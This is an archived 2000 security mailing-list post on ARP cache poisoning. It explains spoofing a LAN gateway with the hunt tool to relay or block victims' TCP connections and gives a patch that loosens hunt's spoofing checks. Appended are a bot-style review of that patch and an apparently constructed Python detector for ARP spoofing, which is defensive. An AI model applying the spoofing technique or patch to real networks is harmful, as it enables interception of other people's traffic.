Vulnerability Development mailing list archives
Re: More on ARP cache poisoning
From: lamont () ICOPYRIGHT COM (Granquist, Lamont)
Date: Thu, 3 Feb 2000 08:16:26 -0800
On Wed, 2 Feb 2000, Sebastian wrote:
Yea, this has been in use for like 3 years now, just grab hunt and ARP relay external connections by ARP spoofing the gateway. There is no problem with redirecting/relaying/denying any TCP connection within a switched/non-switched LAN when there are no static ARP entries. Just ARP spoof the gateway address into the victim's cache and have IP forwarding enabled.
You also need the following patch for hunt 1.3: --- arpspoof.c~ Sun Oct 3 10:16:35 1999 +++ arpspoof.c Sun Oct 3 10:16:58 1999 @@ -432,8 +432,8 @@ list_lock(&l_arp_spoof); list_iter_set(&li, &l_arp_spoof); while ((asi = list_iter_get(&li))) { - if (p->p_iph->saddr == asi->dst_addr && - p->p_iph->daddr == asi->src_addr && + if (/* p->p_iph->saddr == asi->dst_addr && + p->p_iph->daddr == asi->src_addr && */ memcmp(p->p_ethh->h_source, asi->dst_mac, ETH_ALEN) == 0 && memcmp(p->p_ethh->h_dest, asi->src_fake_mac, ETH_ALEN) == 0) { packet_want(p); (if that doesn't apply you probably lost the tabs) I've also found that Cisco 2621s don't seem to accept the gratuitous ARPs that hunt sends out.
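Review bot: the source/destination IP comparison at the top of the `if` in the `l_arp_spoof` loop is disabled by wrapping it in a comment, which leaves dead code inside the condition and records no reason for the change. With those two lines out, the match rests only on `p->p_ethh->h_source` against `asi->dst_mac` and `p->p_ethh->h_dest` against `asi->src_fake_mac`, so `asi->dst_addr` and `asi->src_addr` are no longer consulted for any entry in the list, not just the gateway case this is meant for. Either make the IP test conditional per entry or delete the two lines outright, and add a short comment stating why MAC-only matching is wanted. Since the poster notes the patch may not apply once tabs are lost, send it as an attachment rather than inline.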
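The quoted post notes that the relay only works when there are no static ARP entries. As an added example (not from the post and not part of hunt), here is the matching check on the defender's side: parse ARP frames and flag any sender that claims a pinned gateway address, or a previously seen address, with a different MAC. The addresses, `PINNED`, and all function names are constructed for illustration.

```python
import struct

# Constructed values: the gateway binding a defender would pin (static ARP entry).
PINNED = {"192.0.2.1": "00:11:22:33:44:55"}

def _mac(b): return ":".join(f"{x:02x}" for x in b)
def _ip(b): return ".".join(str(x) for x in b)

def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip) for an Ethernet/IPv4 ARP frame, else None."""
    if len(frame) < 42:
        return None
    (ethertype,) = struct.unpack("!H", frame[12:14])
    if ethertype != 0x0806:
        return None
    htype, ptype, hlen, plen, op, sha, spa, _tha, _tpa = struct.unpack(
        "!HHBBH6s4s6s4s", frame[14:42])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return op, _mac(sha), _ip(spa)

def check_frames(frames, pinned=PINNED):
    """Return alerts (index, kind, ip, claimed_mac) for conflicting IP-to-MAC claims."""
    learned, alerts = dict(pinned), []
    for i, frame in enumerate(frames):
        parsed = parse_arp(frame)
        if parsed is None:
            continue
        _op, mac, ip = parsed
        known = learned.setdefault(ip, mac)  # first sighting of an unpinned IP is trusted
        if known != mac:
            kind = "pinned-binding-violated" if ip in pinned else "binding-changed"
            alerts.append((i, kind, ip, mac))
    return alerts

def build_arp(op, sha, spa, tha, tpa):
    """Construct a sample ARP frame (test input only, not captured traffic)."""
    m = lambda s: bytes.fromhex(s.replace(":", ""))
    a = lambda s: bytes(int(x) for x in s.split("."))
    eth = m("ff:ff:ff:ff:ff:ff") + m(sha) + struct.pack("!H", 0x0806)
    return eth + struct.pack("!HHBBH", 1, 0x0800, 6, 4, op) + m(sha) + a(spa) + m(tha) + a(tpa)

# Constructed sample traffic: two consistent frames, then two conflicting claims.
SAMPLE = [
    build_arp(2, "00:11:22:33:44:55", "192.0.2.1", "02:00:00:00:00:10", "192.0.2.10"),
    build_arp(1, "02:00:00:00:00:10", "192.0.2.10", "00:00:00:00:00:00", "192.0.2.1"),
    build_arp(2, "02:00:00:00:00:66", "192.0.2.1", "02:00:00:00:00:10", "192.0.2.10"),
    build_arp(2, "02:00:00:00:00:77", "192.0.2.10", "ff:ff:ff:ff:ff:ff", "192.0.2.10"),
]
```

Without a pinned entry the same conflict is still reported, but only as `binding-changed`, because the first claim seen for an address is taken on trust.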